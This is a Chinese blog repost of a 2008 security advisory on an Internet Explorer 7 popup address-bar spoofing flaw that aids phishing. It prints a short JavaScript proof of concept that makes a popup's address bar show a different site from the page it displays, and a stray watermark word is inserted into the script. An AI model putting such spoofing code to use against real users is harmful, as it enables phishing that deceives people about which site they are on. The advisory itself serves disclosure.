always there for you

善于生活,善于学习,这是我和你的目标.

« 防止用户重复登陆-asp一条Linux命令,一段人类文明 »

Microsoft IE 7弹出窗口地址栏URI欺骗漏洞

时间:2008-04-02  作者:bitsCN整理  来源:中国网管联盟

涉及程序:
Internet Explorer
 
描述:
Microsoft IE 7弹出窗口地址栏URI欺骗漏洞
 
 
详细:
Internet Explorer是微软发布的非常流行的WEB浏览器。

如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。

<*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com

链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2
*>

受影响系统:
Microsoft Internet Explorer 7.0
 
 
攻击方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<script language="JavaScript">
function iniciar()
{

nuevaventana = window.open("", "Win", "width=500,height=500,location=1");

nuevaventana.document.location = "http://www.google.com.ar/#" + "www.microsoft.com/";
bitsCN_com


}
iniciar()
</script>
 
 
解决方案:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

本文来自: 中国网管联盟(bitsCN.com) 详细出处参考:http://www.bitscn.com/hack/microsoft/200804/136753.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

日历

最新评论及回复

最近发表

Copyright www.alwaysthere.com.cn . Some Rights Reserved.

              

Powered By Z-Blog 1.8 Devo Build 80201